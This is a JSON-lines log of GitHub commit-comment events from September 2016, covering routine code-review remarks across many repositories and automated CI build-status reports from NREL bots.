{"id":"4566291627","type":"CommitCommentEvent","actor":{"login":"jillHuang7"},"repo":{"name":"CS111C-META-FALL-2016/LabC-Team1"},"payload":{"comment":{"id":19031048,"position":9,"line":131,"path":"src/EntryWayList.java","commit_id":"195c49181db3bbe1d7bbcc5011de21e0b12d07fd","created_at":"2016-09-15T06:15:04Z","updated_at":"2016-09-15T06:15:04Z","body":"I am thinking if we need to use boolean for contains?:\r\n public boolean contains(T anEntry)"}},"created_at":"2016-09-15T06:15:04Z"}
{"id":"4566292996","type":"CommitCommentEvent","actor":{"login":"jillHuang7"},"repo":{"name":"CS111C-META-FALL-2016/LabC-Team1"},"payload":{"comment":{"id":19031050,"position":10,"line":130,"path":"src/EntryWayList.java","commit_id":"195c49181db3bbe1d7bbcc5011de21e0b12d07fd","created_at":"2016-09-15T06:15:33Z","updated_at":"2016-09-15T06:15:33Z","body":"I am thinking if we need to use boolean for contains?:\r\npublic boolean contains(T anEntry)"}},"created_at":"2016-09-15T06:15:33Z"}
{"id":"4566296118","type":"CommitCommentEvent","actor":{"login":"enj6216"},"repo":{"name":"facebookarchive/huxley"},"payload":{"comment":{"id":19031060,"position":4,"line":6,"path":"CHANGELOG.md","commit_id":"2177563400ba03580622144b521bb116c345225c","created_at":"2016-09-15T06:16:45Z","updated_at":"2016-09-15T06:16:45Z","body":"Pillow"}},"created_at":"2016-09-15T06:16:45Z"}
{"id":"4566300605","type":"CommitCommentEvent","actor":{"login":"eafzali"},"repo":{"name":"Velro/timelapse"},"payload":{"comment":{"id":19031073,"position":56,"line":52,"path":"ffmpegWrapper.js","commit_id":"f4ab3a05855dd09c983d5f3b15abd99f02c8aed0","created_at":"2016-09-15T06:18:20Z","updated_at":"2016-09-15T06:18:20Z","body":"You sould do:\r\n> return new Promise((resolve, reject) => {\r\nAnd then call resolve When done or reject in case of an error"}},"created_at":"2016-09-15T06:18:20Z"}
{"id":"4566301449","type":"CommitCommentEvent","actor":{"login":"enj6216"},"repo":{"name":"facebookarchive/huxley"},"payload":{"comment":{"id":19031077,"position":4,"line":6,"path":"CHANGELOG.md","commit_id":"2177563400ba03580622144b521bb116c345225c","created_at":"2016-09-15T06:18:38Z","updated_at":"2016-09-15T06:18:38Z","body":"Pillow"}},"created_at":"2016-09-15T06:18:38Z"}
{"id":"4566301471","type":"CommitCommentEvent","actor":{"login":"XD-DENG"},"repo":{"name":"yihengli/ECharts2Shiny"},"payload":{"comment":{"id":19031078,"position":null,"line":null,"path":null,"commit_id":"dc0f276238696a7269395eced82f3badfe38f726","created_at":"2016-09-15T06:18:39Z","updated_at":"2016-09-15T06:18:39Z","body":"Hi @yihengli\r\n \r\nIt's good to find that you're keeping using this package. Would be more than happy if you can add it back to the master repo so I can update it on CRAN. \r\n\r\nThanks"}},"created_at":"2016-09-15T06:18:39Z"}
{"id":"4566303606","type":"CommitCommentEvent","actor":{"login":"enj6216"},"repo":{"name":"facebookarchive/huxley"},"payload":{"comment":{"id":19031083,"position":3,"line":5,"path":"CHANGELOG.md","commit_id":"2177563400ba03580622144b521bb116c345225c","created_at":"2016-09-15T06:19:24Z","updated_at":"2016-09-15T06:19:24Z","body":"0.5"}},"created_at":"2016-09-15T06:19:24Z"}
{"id":"4566304734","type":"CommitCommentEvent","actor":{"login":"ttvi"},"repo":{"name":"scality/sproxydclient"},"payload":{"comment":{"id":19031087,"position":31,"line":25,"path":"lib/sproxyd.js","commit_id":"48e404c997d126d669d4312bd131b7d9cf59b3ec","created_at":"2016-09-15T06:19:49Z","updated_at":"2016-09-15T06:19:49Z","body":"Should response's data got consumed before returning the error? In some cases of error, like 404, there is data in the response `<html><head><title>404 - Not Found</title></head><body><h1>404 - Not Found</h1></body></html>`."}},"created_at":"2016-09-15T06:19:49Z"}
{"id":"4566305886","type":"CommitCommentEvent","actor":{"login":"snak3ater"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19031094,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T06:20:14Z","updated_at":"2016-09-15T06:20:14Z","body":"@xyyx It's not a suggestion. It's conditional"}},"created_at":"2016-09-15T06:20:14Z"}
{"id":"4566306296","type":"CommitCommentEvent","actor":{"login":"eafzali"},"repo":{"name":"Velro/timelapse"},"payload":{"comment":{"id":19031098,"position":247,"line":165,"path":"ffmpegWrapper.js","commit_id":"f4ab3a05855dd09c983d5f3b15abd99f02c8aed0","created_at":"2016-09-15T06:20:23Z","updated_at":"2016-09-15T06:20:23Z","body":"And here you should return a promise maybe the one returned from selected function. "}},"created_at":"2016-09-15T06:20:23Z"}
{"id":"4566310860","type":"CommitCommentEvent","actor":{"login":"xyyx"},"repo":{"name":"DirtyUnicorns/android_packages_apps_Settings"},"payload":{"comment":{"id":19031110,"position":null,"line":null,"path":null,"commit_id":"2cc5f0457adfb02100c3c030badb5b30eeaa2afa","created_at":"2016-09-15T06:22:05Z","updated_at":"2016-09-15T06:22:05Z","body":"Fuck) What is it suggestion?)"}},"created_at":"2016-09-15T06:22:05Z"}
{"id":"4566311851","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19031112,"position":null,"line":null,"path":null,"commit_id":"3c8ea0c902d6e666255a2a94435b08100521b88c","created_at":"2016-09-15T06:22:25Z","updated_at":"2016-09-15T06:22:25Z","body":"Related to: backdrop/backdrop-issues#897 "}},"created_at":"2016-09-15T06:22:25Z"}
{"id":"4566311861","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19031113,"position":null,"line":null,"path":null,"commit_id":"d194951712d12dabfca1a496d8be6c92ddc88192","created_at":"2016-09-15T06:22:25Z","updated_at":"2016-09-15T06:22:25Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T06:22:25Z"}
{"id":"4566311873","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19031114,"position":null,"line":null,"path":null,"commit_id":"3bba58dc54846a6fc1726a5f4e791d45a3ececc4","created_at":"2016-09-15T06:22:25Z","updated_at":"2016-09-15T06:22:25Z","body":"Related to: backdrop/backdrop-issues#897 "}},"created_at":"2016-09-15T06:22:25Z"}
{"id":"4566311887","type":"CommitCommentEvent","actor":{"login":"backdrop-ci"},"repo":{"name":"backdrop/backdrop"},"payload":{"comment":{"id":19031115,"position":null,"line":null,"path":null,"commit_id":"d5e9a505cbb205e49e48015d18fce2ca88fef2c4","created_at":"2016-09-15T06:22:25Z","updated_at":"2016-09-15T06:22:25Z","body":"Related to: backdrop/backdrop-issues#2107 "}},"created_at":"2016-09-15T06:22:25Z"}
{"id":"4566313031","type":"CommitCommentEvent","actor":{"login":"jingchunzhu"},"repo":{"name":"ucscXena/ucsc-xena-client"},"payload":{"comment":{"id":19031121,"position":null,"line":null,"path":null,"commit_id":"f191db2e71052628dbdbec302b741af4f9b604f4","created_at":"2016-09-15T06:22:53Z","updated_at":"2016-09-15T06:22:53Z","body":">_.getIn(column, ['datasetMetadata', 0, 'dataSubType'], 'clinical')\r\nThanks!"}},"created_at":"2016-09-15T06:22:53Z"}
{"id":"4566313315","type":"CommitCommentEvent","actor":{"login":"sarojmaharjan99999"},"repo":{"name":"sarojmaharjan99999/Ecommerce"},"payload":{"comment":{"id":19031122,"position":null,"line":null,"path":null,"commit_id":"08be0dfcb0af2316b4098df7181c6fc6b4289277","created_at":"2016-09-15T06:23:00Z","updated_at":"2016-09-15T06:23:00Z","body":":+1: "}},"created_at":"2016-09-15T06:23:00Z"}
{"id":"4566323431","type":"CommitCommentEvent","actor":{"login":"deepu105"},"repo":{"name":"spring-projects/spring-boot"},"payload":{"comment":{"id":19031137,"position":6,"line":828,"path":"spring-boot/src/test/java/org/springframework/boot/context/config/ConfigFileApplicationListenerTests.java","commit_id":"0606428609597961da5f20c8a3305222812df989","created_at":"2016-09-15T06:26:46Z","updated_at":"2016-09-15T06:26:46Z","body":"Just nitpicking. Here `this.context.getEnvironment()` can be replaced with the variable `environment`"}},"created_at":"2016-09-15T06:26:46Z"}
{"id":"4566326861","type":"CommitCommentEvent","actor":{"login":"DianeOfTheMoon"},"repo":{"name":"DianeOfTheMoon/Roth_UI"},"payload":{"comment":{"id":19031150,"position":121,"line":121,"path":"embeds/RothFont/Config.lua","commit_id":"e1f617ac90d8c93552931bcd745e4ffccc1a0833","created_at":"2016-09-15T06:28:06Z","updated_at":"2016-09-15T06:28:06Z","body":"With the way things are set up, each embed and module can add its own config."}},"created_at":"2016-09-15T06:28:06Z"}
{"id":"4566328490","type":"CommitCommentEvent","actor":{"login":"mlyle"},"repo":{"name":"mlyle/dronin"},"payload":{"comment":{"id":19031158,"position":21,"line":484,"path":"flight/Modules/CharacterOSD/panel.c","commit_id":"74cb87cc21ddf7399b9149f6e2268ad486b87c86","created_at":"2016-09-15T06:28:42Z","updated_at":"2016-09-15T06:28:42Z","body":"can we test for the existence of the uavos for this stuff?  For battery-- for sure.  Maybe gpsposition gets inited anyways, but at least we could use the same has_nav test as the main osd."}},"created_at":"2016-09-15T06:28:42Z"}
{"id":"4566334859","type":"CommitCommentEvent","actor":{"login":"enj6216"},"repo":{"name":"gztchan/awesome-design"},"payload":{"comment":{"id":19031175,"position":5,"line":348,"path":"README.md","commit_id":"5318537a7fc16c5b1e38aa9f9aead65a685b0452","created_at":"2016-09-15T06:31:04Z","updated_at":"2016-09-15T06:31:04Z","body":"Starbucks"}},"created_at":"2016-09-15T06:31:04Z"}
{"id":"4566336917","type":"CommitCommentEvent","actor":{"login":"Ne3tCode"},"repo":{"name":"DoctorMcKay/node-steamcommunity"},"payload":{"comment":{"id":19031177,"position":36,"line":315,"path":"index.js","commit_id":"1b60712b8bd164505ff199b4ed86c2a017f7bb5e","created_at":"2016-09-15T06:31:46Z","updated_at":"2016-09-15T06:31:46Z","body":"Looks like this is `Account Alert`. In my case, \"+1\" appeared when publisher revoked the key, but i didn't checked \"I have read this message\"."}},"created_at":"2016-09-15T06:31:46Z"}
{"id":"4566338472","type":"CommitCommentEvent","actor":{"login":"PawelGutkowski"},"repo":{"name":"openmrs/openmrs-distro-referenceapplication"},"payload":{"comment":{"id":19031178,"position":null,"line":null,"path":null,"commit_id":"bfff91b2955476fc02361e3b3fccbf7558174c4a","created_at":"2016-09-15T06:32:21Z","updated_at":"2016-09-15T06:32:21Z","body":"Hey @dkayiwa, you and @rkorytkowski have changed a couple of modules versions lately, and now Reference Application fails to start on Travis https://travis-ci.org/openmrs/openmrs-distro-referenceapplication/builds/160024010 and on my machine http://pastebin.com/vLSzSMbq "}},"created_at":"2016-09-15T06:32:21Z"}
{"id":"4566352463","type":"CommitCommentEvent","actor":{"login":"ahmad6508"},"repo":{"name":"ahmad6508/goodboy6508"},"payload":{"comment":{"id":19031205,"position":null,"line":null,"path":null,"commit_id":"68f00d02fdb657fb99c08e18bdf86fde83f5cb8e","created_at":"2016-09-15T06:37:33Z","updated_at":"2016-09-15T06:37:33Z","body":"salam"}},"created_at":"2016-09-15T06:37:33Z"}
{"id":"4566353317","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031206,"position":null,"line":null,"path":null,"commit_id":"5a365e54deb644b86a634dbb422c67c25bcc6393","created_at":"2016-09-15T06:37:50Z","updated_at":"2016-09-15T06:37:50Z","body":"versionNumbers (mitchute) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1762 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5a365e54deb644b86a634dbb422c67c25bcc6393-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.89%25-green.svg)</a>\n"}},"created_at":"2016-09-15T06:37:50Z"}
{"id":"4566359558","type":"CommitCommentEvent","actor":{"login":"sarojmaharjan99999"},"repo":{"name":"sarojmaharjan99999/Ecommerce"},"payload":{"comment":{"id":19031222,"position":null,"line":null,"path":null,"commit_id":"08be0dfcb0af2316b4098df7181c6fc6b4289277","created_at":"2016-09-15T06:40:06Z","updated_at":"2016-09-15T06:40:06Z","body":"I guess this code is not working. Still there is case sensitive."}},"created_at":"2016-09-15T06:40:06Z"}
{"id":"4566360239","type":"CommitCommentEvent","actor":{"login":"florapdx"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19031223,"position":null,"line":null,"path":null,"commit_id":"0ca3386a59146316b12eeda19895ef6b0d81666f","created_at":"2016-09-15T06:40:19Z","updated_at":"2016-09-15T06:40:19Z","body":"@jlongster I think this may have inadvertently introduced a bug where the content throughout the docs isn't y-scrollable (discovered in Chrome, tested in Firefox). I'm hesitant to submit a PR since I'm assuming removing the rule will just reproduce the bug you fixed ^, and I'm not sure if overflow-x: hidden or reworking some part of the layout is the ultimate solution."}},"created_at":"2016-09-15T06:40:19Z"}
{"id":"4566360535","type":"CommitCommentEvent","actor":{"login":"sokra"},"repo":{"name":"webpack/webpack"},"payload":{"comment":{"id":19031224,"position":292,"line":292,"path":"lib/RuleSet.js","commit_id":"a53799c0ac58983860a27648cdc8519b6a562b89","created_at":"2016-09-15T06:40:25Z","updated_at":"2016-09-15T06:40:25Z","body":"Thanks, good find. Fixed it."}},"created_at":"2016-09-15T06:40:25Z"}
{"id":"4566363002","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19031228,"position":null,"line":null,"path":null,"commit_id":"49269ce04c82509febb2115873ba743002882775","created_at":"2016-09-15T06:41:20Z","updated_at":"2016-09-15T06:41:20Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-49269ce04c82509febb2115873ba743002882775-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-49269ce04c82509febb2115873ba743002882775-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T06:41:20Z"}
{"id":"4566363122","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19031229,"position":4,"line":9,"path":"language/en.js","commit_id":"8695c00d3f2ac1f1fd20875f304ba48cb866d4c2","created_at":"2016-09-15T06:41:23Z","updated_at":"2016-09-15T06:41:23Z","body":"Fixed here: https://github.com/h5p/h5p-editor-php-library/commit/c70cac28c9171f2ccc7a3765b02196a6547e1b62"}},"created_at":"2016-09-15T06:41:23Z"}
{"id":"4566365125","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031231,"position":null,"line":null,"path":null,"commit_id":"8b8226a4796b6cc30e977e8d8828d38d92452211","created_at":"2016-09-15T06:42:05Z","updated_at":"2016-09-15T06:42:05Z","body":"makingPrettyTransition (mitchute) - Win64-Windows-7-VisualStudio-12: OK (2328 of 2335 tests passed, 24 test warnings)\n\n * 10 tests had: AUD diffs.\n * 31 tests had: ERR diffs.\n * 7 tests had: Table big diffs.\n * 21 tests had: EIO diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8b8226a4796b6cc30e977e8d8828d38d92452211-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.7%25-yellow.svg)</a> \n"}},"created_at":"2016-09-15T06:42:05Z"}
{"id":"4566366677","type":"CommitCommentEvent","actor":{"login":"theyongdai"},"repo":{"name":"XVimProject/XVim"},"payload":{"comment":{"id":19031234,"position":15,"line":16,"path":"README.md","commit_id":"3eb09a6ffa68b4bc23b6d0703caea9e6152cd125","created_at":"2016-09-15T06:42:37Z","updated_at":"2016-09-15T06:42:37Z","body":"The new XCode update from App store crashes too."}},"created_at":"2016-09-15T06:42:37Z"}
{"id":"4566369409","type":"CommitCommentEvent","actor":{"login":"724888"},"repo":{"name":"724888/-"},"payload":{"comment":{"id":19031241,"position":null,"line":null,"path":null,"commit_id":"b0eb0f04eb3153db49e9dce87812febe06989cf7","created_at":"2016-09-15T06:43:36Z","updated_at":"2016-09-15T06:43:36Z","body":"1"}},"created_at":"2016-09-15T06:43:36Z"}
{"id":"4566369469","type":"CommitCommentEvent","actor":{"login":"olivieer"},"repo":{"name":"olivieer/android_kernel_sony_msm8994"},"payload":{"comment":{"id":19031242,"position":null,"line":null,"path":null,"commit_id":"4665bfc0c2f9e31d7b17956878ee2a3c6c6fdb92","created_at":"2016-09-15T06:43:37Z","updated_at":"2016-09-15T06:43:37Z","body":"Nope - I don't have any logs. It should be working fine (this driver is used in many custom kernels)."}},"created_at":"2016-09-15T06:43:37Z"}
{"id":"4566370187","type":"CommitCommentEvent","actor":{"login":"janhoy"},"repo":{"name":"healthonnet/hon-lucene-synonyms"},"payload":{"comment":{"id":19031244,"position":null,"line":null,"path":null,"commit_id":"c87fb8ced0abc9e19381a4843c964cf8473e8912","created_at":"2016-09-15T06:43:52Z","updated_at":"2016-09-15T06:43:52Z","body":"Do you know if HON still uses this plugin?"}},"created_at":"2016-09-15T06:43:52Z"}
{"id":"4566370941","type":"CommitCommentEvent","actor":{"login":"MarcelVP"},"repo":{"name":"MarcelVP/Hello-World"},"payload":{"comment":{"id":19031245,"position":null,"line":null,"path":null,"commit_id":"42ce66857e704cfa526b4c91c9e6084732a4d548","created_at":"2016-09-15T06:44:08Z","updated_at":"2016-09-15T06:44:08Z","body":"lijkt me ok om te mergen"}},"created_at":"2016-09-15T06:44:08Z"}
{"id":"4566378440","type":"CommitCommentEvent","actor":{"login":"kliput"},"repo":{"name":"aexmachina/ember-notify"},"payload":{"comment":{"id":19031262,"position":null,"line":null,"path":null,"commit_id":"d5a81aeec3fdf1bc649f097555f36e996bb10458","created_at":"2016-09-15T06:46:40Z","updated_at":"2016-09-15T06:46:40Z","body":"I'm using Ember 2.7. Is it working on 2.8?"}},"created_at":"2016-09-15T06:46:40Z"}
{"id":"4566379374","type":"CommitCommentEvent","actor":{"login":"daniktheboss"},"repo":{"name":"spiffy/PyRakLib"},"payload":{"comment":{"id":19031266,"position":null,"line":null,"path":null,"commit_id":"6fb5c8b20cd9181ab56762281947e96cfaa4a22a","created_at":"2016-09-15T06:47:00Z","updated_at":"2016-09-15T06:47:00Z","body":"Any news?"}},"created_at":"2016-09-15T06:47:00Z"}
{"id":"4566380629","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031267,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T06:47:28Z","updated_at":"2016-09-15T06:47:28Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (1781 of 1781 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-15T06:47:28Z"}
{"id":"4566380712","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19031268,"position":null,"line":null,"path":null,"commit_id":"2a967578886ffd70235f6e95efd2115ee36b04d6","created_at":"2016-09-15T06:47:30Z","updated_at":"2016-09-15T06:47:30Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2a967578886ffd70235f6e95efd2115ee36b04d6-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-2a967578886ffd70235f6e95efd2115ee36b04d6-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T06:47:30Z"}
{"id":"4566381342","type":"CommitCommentEvent","actor":{"login":"vnitinv"},"repo":{"name":"Juniper/ansible-junos-stdlib"},"payload":{"comment":{"id":19031270,"position":null,"line":null,"path":null,"commit_id":"b5d8877813344567424480d4052eefa4764108cf","created_at":"2016-09-15T06:47:43Z","updated_at":"2016-09-15T06:47:43Z","body":"@ktbyers Fixed via https://github.com/Juniper/ansible-junos-stdlib/pull/160"}},"created_at":"2016-09-15T06:47:43Z"}
{"id":"4566383277","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19031272,"position":null,"line":null,"path":null,"commit_id":"49269ce04c82509febb2115873ba743002882775","created_at":"2016-09-15T06:48:24Z","updated_at":"2016-09-15T06:48:24Z","body":"os_2_0_develop_linux (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-49269ce04c82509febb2115873ba743002882775-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-15T06:48:24Z"}
{"id":"4566389703","type":"CommitCommentEvent","actor":{"login":"shivapoudel"},"repo":{"name":"woothemes/woocommerce"},"payload":{"comment":{"id":19031285,"position":null,"line":null,"path":null,"commit_id":"486449bf07a347e3df339d2ad1cd501b38c2eeda","created_at":"2016-09-15T06:50:37Z","updated_at":"2016-09-15T06:50:37Z","body":"@claudiosmweb I think `composer.lock` file was unknowingly pushed, should be ignore in your `.gitignore_global` :P"}},"created_at":"2016-09-15T06:50:37Z"}
{"id":"4566389843","type":"CommitCommentEvent","actor":{"login":"willdurand"},"repo":{"name":"clermontech/Introducing-APIHours"},"payload":{"comment":{"id":19031286,"position":50,"line":87,"path":"introducing-apihours.md","commit_id":"13f5840a38476ab6ca34ae3bfa947737067b7a7d","created_at":"2016-09-15T06:50:41Z","updated_at":"2016-09-15T06:50:41Z","body":"On pourrait avoir une entrée dans pour rediriger non ? Genre : Clermontech.org/survey"}},"created_at":"2016-09-15T06:50:41Z"}
{"id":"4566391485","type":"CommitCommentEvent","actor":{"login":"tanhanliang"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19031288,"position":null,"line":null,"path":null,"commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-15T06:51:14Z","updated_at":"2016-09-15T06:51:14Z","body":"Problems:\r\n1. Code in members.blade.php looks very messy and dubious, but I don't know how else to do it :(\r\n2. Label for collection of checkboxes looks like the label for one checkbox, confusing\r\n3. I'm not sure how to make the checkboxes remember the previous options selected"}},"created_at":"2016-09-15T06:51:14Z"}
{"id":"4566393952","type":"CommitCommentEvent","actor":{"login":"le9i0nx"},"repo":{"name":"debops/ansible-console"},"payload":{"comment":{"id":19031293,"position":3,"line":3,"path":"templates/etc/systemd/system/systemd-logind.service.d/hidepid.conf.j2","commit_id":"01afad3cbe59a637bed7aeef65ab0f258ac8b079","created_at":"2016-09-15T06:51:57Z","updated_at":"2016-09-15T06:51:57Z","body":"Why is this comment\r\nThis page no 404"}},"created_at":"2016-09-15T06:51:57Z"}
{"id":"4566396673","type":"CommitCommentEvent","actor":{"login":"drybjed"},"repo":{"name":"debops/ansible-console"},"payload":{"comment":{"id":19031300,"position":3,"line":3,"path":"templates/etc/systemd/system/systemd-logind.service.d/hidepid.conf.j2","commit_id":"01afad3cbe59a637bed7aeef65ab0f258ac8b079","created_at":"2016-09-15T06:52:54Z","updated_at":"2016-09-15T06:52:54Z","body":"I suppose that it was removed at some point. Thanks for the hint."}},"created_at":"2016-09-15T06:52:54Z"}
{"id":"4566400141","type":"CommitCommentEvent","actor":{"login":"yeshwanthvshenoy"},"repo":{"name":"yeshwanthvshenoy/Open-Java-Problems"},"payload":{"comment":{"id":19031310,"position":null,"line":null,"path":null,"commit_id":"ce4cc89e35b2e15c9e90489946926e9ec0cf8f10","created_at":"2016-09-15T06:54:04Z","updated_at":"2016-09-15T06:54:04Z","body":"Courtesy : [http://www.geeksforgeeks.org/zoho-interview-set-1-campus/](http://www.geeksforgeeks.org/zoho-interview-set-1-campus/)"}},"created_at":"2016-09-15T06:54:04Z"}
{"id":"4566400489","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19031311,"position":null,"line":null,"path":null,"commit_id":"c6a5bac3b25ab75c405491f66b5e1e372d08b5e8","created_at":"2016-09-15T06:54:11Z","updated_at":"2016-09-15T06:54:11Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c6a5bac3b25ab75c405491f66b5e1e372d08b5e8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-15T06:54:11Z"}
{"id":"4566404487","type":"CommitCommentEvent","actor":{"login":"ppietikainen"},"repo":{"name":"ouspg/cse-dtyo"},"payload":{"comment":{"id":19031320,"position":null,"line":null,"path":null,"commit_id":"9e2f49938699cc5efd04e5395739a42ccd385e88","created_at":"2016-09-15T06:55:29Z","updated_at":"2016-09-15T06:55:29Z","body":"This commit introduced DOS newlines, changing every line and making it impossible too see what got changed... I just added a .gitattributes that should stop this from happening in the future, \r\ngit diff 25b5b17d36e638ef171683d920e2f35cdda5d2d2..e350af0950868a2a77a6271d4a9edb8c76d83a18 dt.tex shows the actual changes...\r\n\r\n\r\n"}},"created_at":"2016-09-15T06:55:29Z"}
{"id":"4566416131","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19031350,"position":null,"line":null,"path":null,"commit_id":"318aef408432fe5c781f503a6e5b1c00a4ca9a9a","created_at":"2016-09-15T06:59:06Z","updated_at":"2016-09-15T06:59:06Z","body":"Nice!!   :smile: :sunglasses:"}},"created_at":"2016-09-15T06:59:06Z"}
{"id":"4566418012","type":"CommitCommentEvent","actor":{"login":"jmontoyaa"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":19031354,"position":null,"line":null,"path":null,"commit_id":"7871ca0b17d8758288fa4e0dbe8e5ff6de456932","created_at":"2016-09-15T06:59:43Z","updated_at":"2016-09-15T06:59:43Z","body":":+1: "}},"created_at":"2016-09-15T06:59:43Z"}
{"id":"4566419465","type":"CommitCommentEvent","actor":{"login":"jafdy"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":19031360,"position":null,"line":null,"path":null,"commit_id":"4f8a24d5566e3b95f85506ec5e1671b3e968c58b","created_at":"2016-09-15T07:00:12Z","updated_at":"2016-09-15T07:00:12Z","body":"This can get someone stuck if the update comes through after they start recon 1 and before they start evacuation 1."}},"created_at":"2016-09-15T07:00:12Z"}
{"id":"4566422423","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19031380,"position":null,"line":null,"path":null,"commit_id":"cbce352cdc45e56000eba299168b54ae1c95ea0e","created_at":"2016-09-15T07:01:01Z","updated_at":"2016-09-15T07:01:01Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cbce352cdc45e56000eba299168b54ae1c95ea0e-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-15T07:01:01Z"}
